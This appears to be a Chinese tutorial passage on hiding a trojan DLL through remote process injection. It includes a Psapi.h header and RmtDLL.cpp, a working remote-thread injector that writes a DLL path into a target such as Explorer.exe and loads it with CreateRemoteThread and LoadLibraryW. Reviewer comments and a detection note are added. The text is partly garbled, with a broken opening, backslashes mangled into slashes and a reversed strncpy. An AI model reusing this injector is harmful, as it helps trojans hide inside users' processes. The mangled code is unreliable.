DLL
木马
LL32
的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个Rundll32.exe容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马DLL,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好的隐藏自己,也能更好的保护自己。此时的木马,不仅欺骗,进入计算机,甚至进入了用户进程的内部。
Psapi.h
/*
 * Psapi.h - Process Status API (psapi.dll) declarations.
 *
 * A trimmed copy of the Platform SDK header: it contains only prototypes,
 * structs and the A/W name-selection macros, and defines no behaviour of
 * its own. It relies on <windows.h> having been included first for BOOL,
 * DWORD, HANDLE, HMODULE, SIZE_T, LPSTR/LPWSTR and WINAPI (RmtDLL.cpp
 * includes it in that order).
 *
 * Size-argument convention (per the SDK documentation): parameters named
 * cb / lpcbNeeded are byte counts; parameters named nSize are buffer sizes
 * in characters. Passing one where the other is expected is a classic
 * caller bug, so each prototype below notes which it takes.
 */
#ifndef _PSAPI_H_
#define _PSAPI_H_
/* MSVC-only include optimisation; the guard above is the portable one. */
#if _MSC_VER > 1000
#pragma once
#endif
#ifdef __cplusplus
extern "C" {
#endif
/* Fill lpidProcess with the PIDs of running processes. cb is the array size
 * in bytes and *cbNeeded the number of bytes written (divide by sizeof(DWORD)
 * for the count). NOTE(review): the call gives no indication when the array
 * was too small -- size generously or retry larger (confirm against SDK docs). */
BOOL
WINAPI
EnumProcesses(
DWORD * lpidProcess,
DWORD cb,
DWORD * cbNeeded
);
/* Fill lphModule with module handles of hProcess. cb / *lpcbNeeded are byte
 * counts; passing sizeof(HMODULE) requests only the first module. */
BOOL
WINAPI
EnumProcessModules(
HANDLE hProcess,
HMODULE *lphModule,
DWORD cb,
LPDWORD lpcbNeeded
);
/* Base file name of hModule within hProcess. nSize is in characters; with a
 * char buffer sizeof() equals the character count only for the A variant. */
DWORD
WINAPI
GetModuleBaseNameA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetModuleBaseNameW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpBaseName,
DWORD nSize
);
/* The un-suffixed name resolves by the UNICODE build setting, not by the
 * argument type: a char* caller must be built without UNICODE defined. */
#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE
/* Full path of hModule within hProcess. nSize in characters. */
DWORD
WINAPI
GetModuleFileNameExA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetModuleFileNameExW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE
/* Load address, image size and entry point of a module (GetModuleInformation). */
typedef struct _MODULEINFO {
LPVOID lpBaseOfDll;
DWORD SizeOfImage;
LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;
/* cb is sizeof(MODULEINFO) in bytes. */
BOOL
WINAPI
GetModuleInformation(
HANDLE hProcess,
HMODULE hModule,
LPMODULEINFO lpmodinfo,
DWORD cb
);
BOOL
WINAPI
EmptyWorkingSet(
HANDLE hProcess
);
/* pv receives working-set page information; cb is its size in bytes. */
BOOL
WINAPI
QueryWorkingSet(
HANDLE hProcess,
PVOID pv,
DWORD cb
);
BOOL
WINAPI
InitializeProcessForWsWatch(
HANDLE hProcess
);
/* One page-fault record (GetWsChanges): faulting instruction and address. */
typedef struct _PSAPI_WS_WATCH_INFORMATION {
LPVOID FaultingPc;
LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;
BOOL
WINAPI
GetWsChanges(
HANDLE hProcess,
PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
DWORD cb
);
/* Name of the file mapped at address lpv in hProcess. nSize in characters. */
DWORD
WINAPI
GetMappedFileNameW(
HANDLE hProcess,
LPVOID lpv,
LPWSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetMappedFileNameA(
HANDLE hProcess,
LPVOID lpv,
LPSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetMappedFileName GetMappedFileNameW
#else
#define GetMappedFileName GetMappedFileNameA
#endif // !UNICODE
/* Kernel-mode driver enumeration; cb / *lpcbNeeded are byte counts. */
BOOL
WINAPI
EnumDeviceDrivers(
LPVOID *lpImageBase,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetDeviceDriverBaseNameA(
LPVOID ImageBase,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverBaseNameW(
LPVOID ImageBase,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetDeviceDriverFileNameA(
LPVOID ImageBase,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverFileNameW(
LPVOID ImageBase,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE
// Structure for GetProcessMemoryInfo()
/* cb must be set by the caller to sizeof the structure actually passed, so
 * the API can tell this layout from the _EX one below. */
typedef struct _PROCESS_MEMORY_COUNTERS {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;
/* Windows XP (0x0501) and later: same prefix plus PrivateUsage. */
#if (_WIN32_WINNT >= 0x0501)
typedef struct _PROCESS_MEMORY_COUNTERS_EX {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivateUsage;
} PROCESS_MEMORY_COUNTERS_EX;
typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
#endif
/* cb is the byte size of the structure behind ppsmemCounters (either layout). */
BOOL
WINAPI
GetProcessMemoryInfo(
HANDLE Process,
PPROCESS_MEMORY_COUNTERS ppsmemCounters,
DWORD cb
);
/* System-wide performance counters. The "PERFORMACE" spelling is the SDK
 * header's own -- keep it, callers and the DLL import use this name. */
typedef struct _PERFORMACE_INFORMATION {
DWORD cb;
SIZE_T CommitTotal;
SIZE_T CommitLimit;
SIZE_T CommitPeak;
SIZE_T PhysicalTotal;
SIZE_T PhysicalAvailable;
SIZE_T SystemCache;
SIZE_T KernelTotal;
SIZE_T KernelPaged;
SIZE_T KernelNonpaged;
SIZE_T PageSize;
DWORD HandleCount;
DWORD ProcessCount;
DWORD ThreadCount;
} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;
BOOL
WINAPI
GetPerformanceInfo (
PPERFORMACE_INFORMATION pPerformanceInformation,
DWORD cb
);
/* Per-page-file record handed to the EnumPageFiles callback. */
typedef struct _ENUM_PAGE_FILE_INFORMATION {
DWORD cb;
DWORD Reserved;
SIZE_T TotalSize;
SIZE_T TotalInUse;
SIZE_T PeakUsage;
} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;
/* Callback signature: pContext is the caller's opaque pointer passed to
 * EnumPageFiles; return value presumably controls continuation (TODO confirm). */
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);
BOOL
WINAPI
EnumPageFilesW (
PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
LPVOID pContext
);
BOOL
WINAPI
EnumPageFilesA (
PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
LPVOID pContext
);
#ifdef UNICODE
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
#define EnumPageFiles EnumPageFilesW
#else
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
#define EnumPageFiles EnumPageFilesA
#endif // !UNICODE
/* Image path of hProcess in device form. nSize in characters. */
DWORD
WINAPI
GetProcessImageFileNameA(
HANDLE hProcess,
LPSTR lpImageFileName,
DWORD nSize
);
DWORD
WINAPI
GetProcessImageFileNameW(
HANDLE hProcess,
LPWSTR lpImageFileName,
DWORD nSize
);
#ifdef UNICODE
#define GetProcessImageFileName GetProcessImageFileNameW
#else
#define GetProcessImageFileName GetProcessImageFileNameA
#endif // !UNICODE
#ifdef __cplusplus
}
#endif
#endif /* _PSAPI_H_ */
RmtDLL.cpp
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include "Psapi.h"
/* Forward declarations for the helpers defined after main(). */
DWORD ProcessToPID(char *);
void CheckError(int,int,char *);
void usage(char *);
/* Process-wide state shared between main() and CheckError(). CheckError()
 * releases whichever of hRemoteProcess / hRemoteThread / pszLibFileRemote is
 * non-NULL before exiting, so they have to live at file scope. Static
 * storage zero-initialises them, which is what makes those NULL tests
 * well-defined before main() has assigned anything. */
PDWORD pdwThreadId;   /* declared but never used in this file */
HANDLE hRemoteThread,hRemoteProcess;
DWORD fdwCreate,dwStackSize,dwRemoteProcessId;   /* fdwCreate and dwStackSize are never used in this file */
PWSTR pszLibFileRemote=NULL;   /* address, inside the target process, of the copied DLL path; NULL until VirtualAllocEx succeeds */
/*
 * Entry point. argv[1] is a PID (when it starts with a digit) or a process
 * image name resolved through ProcessToPID(); argv[2] is the DLL to load.
 * The DLL path is copied into the target with VirtualAllocEx +
 * WriteProcessMemory and loaded there by a remote thread whose start
 * address is kernel32!LoadLibraryW.
 *
 * Defender's note: OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|
 * PROCESS_VM_WRITE) followed by VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread against another process is the textbook remote-thread
 * injection chain; endpoint telemetry (e.g. Sysmon Event ID 8,
 * CreateRemoteThread) keys on exactly this sequence, and a module loaded via
 * LoadLibraryW is visible through the same EnumProcessModules /
 * GetModuleBaseName walk that ProcessToPID() performs -- the "hiding"
 * described in the prose above is only against the process list.
 *
 * Rendering note: string literals in this listing show "/n", "/t" and "//"
 * where the original source appears to have had "\n", "\t" and "\\" (the
 * page converted backslashes to slashes). They are reproduced exactly as
 * shown; nothing below relies on them being correct.
 *
 * Returns nothing ("void main" is non-standard); on any failure CheckError()
 * or usage() terminates the process.
 */
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
/* Zero-filled so the MultiByteToWideChar result below is NUL-terminated
 * as long as it is shorter than MAX_PATH characters. */
WCHAR pszLibFileName[MAX_PATH]={0};
/* usage() calls exit(), so the else branch is the only path that continues. */
if(argc!=3)
usage("parametes number incorrect!");
else
{
/* Stray debug line: "%s" has no matching argument -- undefined behaviour
 * (reads whatever is in the variadic slot). */
printf("%sldskglisagi");
/* isdigit() needs <ctype.h>, which is not included here explicitly;
 * presumably it arrives via <windows.h>/<stdlib.h> on this toolchain -- confirm. */
if(isdigit(*argv[1]))
dwRemoteProcessId=atoi(argv[1]);
else
dwRemoteProcessId = ProcessToPID(argv[1]);
/* Absolute-path test (the "://" is the page-mangled form of ":\\").
 * NOTE(review): the strncpy arguments do not match its (dest, src, n)
 * signature -- argv[2] is the destination here, so lpDllFullPathName is
 * left unset and the uninitialised buffer is written over argv[2]. */
if(strstr(argv[2],"://")!=NULL)
strncpy(argv[2],lpDllFullPathName,MAX_PATH);
else
{
/* Relative name: prefix with the current directory. GetCurrentDirectory
 * returns 0 on failure, hence the 0 sentinel. The two strcat calls are
 * unbounded on a MAX_PATH buffer: cwd + separator + argv[2] longer than
 * MAX_PATH overflows the stack buffer. */
iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);
CheckError(iReturnCode,0,"GetCurrentDirectory");
strcat(lpDllFullPathName,"//");
strcat(lpDllFullPathName,argv[2]);
printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);
}
/* Existence probe only; the HFILE returned by _lopen is never closed
 * with _lclose (handle leak for the rest of the run). */
iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);
CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");
/* strlen() without +1: the terminator comes from the ={0} initialiser
 * above, not from the conversion. */
iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);
CheckError(iReturnCode,0,"MultByteToWideChar");
wprintf(L"Will inject %s",pszLibFileName);
printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);
}
/* Minimal rights for the injection chain. Casting a HANDLE to int for the
 * NULL comparison (also below for the pointer results) truncates on 64-bit. */
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");
/* Byte count of the wide path including its terminator. */
int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);
/* Scratch page in the target; stays committed until the VirtualFreeEx below. */
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");
/* 'false' is C++ (this is a .cpp); bytes-written out-parameter not captured. */
iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
CheckError(iReturnCode,false,"WriteProcessMemory");
/* The address is resolved in this process and reused in the target, which
 * assumes kernel32 is mapped at the same base in both. */
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
CheckError((int)pfnStartAddr,NULL,"GetProcAddress");
hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
/* NOTE(review): this re-tests pfnStartAddr; hRemoteThread itself is never
 * checked before it is waited on. */
CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");
/* Wait result (and the remote LoadLibraryW result) are ignored. */
WaitForSingleObject(hRemoteThread,INFINITE);
if(pszLibFileRemote!=NULL)
VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
if(hRemoteThread!=NULL)
CloseHandle(hRemoteThread);
/* NOTE(review): closes hRemoteThread a second time; hRemoteProcess is
 * never closed on the success path. */
if(hRemoteProcess!=NULL)
CloseHandle(hRemoteThread);
}
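/*
 * Resolve a process image name (e.g. "Explorer.exe", compared
 * case-insensitively) to the PID of the first matching process.
 *
 * Parameters:
 *   InputProcessName  NUL-terminated ANSI base name of the executable
 * Returns the PID, or 0 when nothing matched or EnumProcesses failed;
 * the caller treats 0 as "not found".
 *
 * Processes that cannot be opened with PROCESS_QUERY_INFORMATION |
 * PROCESS_VM_READ (typically access denied) are skipped silently, so a
 * match inside such a process is reported as not found.
 *
 * Fixes versus the original: the per-process handle is closed on every
 * path (the original closed it only on a match, leaked one handle per
 * non-matching process, and then called CloseHandle after the loop on a
 * handle that could be NULL or already closed), and GetModuleBaseName's
 * return value is checked so a failed lookup can no longer compare against
 * the previous iteration's name or the placeholder initialiser.
 */
DWORD ProcessToPID(char *InputProcessName)
{
    /* EnumProcesses works in bytes: cb is sizeof the array and cbNeeded the
     * bytes written, hence the division by sizeof(DWORD). The fixed
     * 1024-entry array is kept from the original; NOTE(review): the call
     * does not report truncation when more processes exist than fit
     * (confirm against SDK docs). */
    DWORD aProcess[1024];
    DWORD cbNeeded = 0;
    if (!EnumProcesses(aProcess, sizeof(aProcess), &cbNeeded))
        return 0;
    DWORD cProcesses = cbNeeded / sizeof(DWORD);

    for (DWORD i = 0; i < cProcesses; i++)
    {
        HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcess[i]);
        if (hProcess == NULL)
            continue;   /* cannot inspect this process; skip it */

        /* Only the first module handle is requested (cb == sizeof(hMod));
         * the lookup relies on that first module being the main executable,
         * whose base name is the process name. */
        HMODULE hMod = NULL;
        DWORD cbMods = 0;
        char szProcessName[MAX_PATH];
        BOOL bMatch = FALSE;
        if (EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbMods)
            && GetModuleBaseName(hProcess, hMod, szProcessName, sizeof(szProcessName)) != 0)
        {
            /* nSize is a character count; sizeof on a char buffer equals that
             * only for the ANSI variant, so this file must build without
             * UNICODE defined (otherwise the char* argument would not compile). */
            bMatch = (_stricmp(szProcessName, InputProcessName) == 0);
        }

        /* Release the handle on every path, not just on a match. */
        CloseHandle(hProcess);
        if (bMatch)
            return aProcess[i];
    }
    /* No process with that name was found (or none could be opened). */
    return 0;
}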
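/*
 * Error handler: if iReturnCode equals the failure value iErrorCode for the
 * call being checked, print pErrorMsg together with the calling thread's
 * last Win32 error, release the shared remote-process resources and
 * terminate the process. Otherwise it is a no-op.
 *
 * Parameters:
 *   iReturnCode  value returned by the checked Win32 call (the callers in
 *                main() cast handles and pointers to int, which truncates
 *                on 64-bit builds)
 *   iErrorCode   the value that means failure for that call
 *                (0, NULL, false or HFILE_ERROR in this file)
 *   pErrorMsg    text printed in front of the error code
 *
 * Fixes versus the original: the DWORD error code is printed with %lu
 * instead of %d (format/argument mismatch), and the process exits with
 * EXIT_FAILURE -- the original exit(0) reported success on every error
 * path, so a script driving the tool could not tell a failed run apart.
 * Cleanup reads the globals defined above main(); each of them is NULL
 * until the corresponding OpenProcess / VirtualAllocEx / CreateRemoteThread
 * call succeeded.
 */
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
    if (iReturnCode != iErrorCode)
        return;

    /* Capture the error code before any cleanup call can overwrite it. */
    DWORD dwLastError = GetLastError();
    printf("%s Error:%lu/n/n", pErrorMsg, dwLastError);

    /* Release whatever main() has acquired so far. */
    if (pszLibFileRemote != NULL)
        VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
    if (hRemoteThread != NULL)
        CloseHandle(hRemoteThread);
    if (hRemoteProcess != NULL)
        CloseHandle(hRemoteProcess);

    /* Non-zero status so callers can distinguish a failed run from success. */
    exit(EXIT_FAILURE);
}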
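/*
 * Print an error line followed by the program banner and command-line help,
 * then terminate the process.
 *
 * Parameters:
 *   pErrorMsg  one-line reason the arguments were rejected; printed first
 *
 * The only caller is the argc check in main(), i.e. this is always an
 * error path. Fix versus the original: it exits with EXIT_FAILURE instead
 * of exit(0), which reported success for a rejected command line.
 * The help text (including its "/n" / "/t" sequences, which appear to be
 * page-mangled "\n" / "\t") is reproduced exactly as in the original.
 */
void usage(char * pErrorMsg)
{
    static const char *const kHelpLines[] = {
        "/t/tRemote Process DLL by liangshuai/n",
        "/tThis program can inject a DLL into remote process/n",
        "Email:/n",
        "/tshuai52@126.com/n",
        "USAGE:/n",
        "/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n",
        "Example:/n",
        "/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n",
        "/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n",
    };

    printf("%s/n/n", pErrorMsg);
    /* fputs rather than printf: the lines contain no conversion
     * specifications, so output is identical and no format parsing occurs. */
    for (size_t i = 0; i < sizeof kHelpLines / sizeof kHelpLines[0]; i++)
        fputs(kHelpLines[i], stdout);

    exit(EXIT_FAILURE);
}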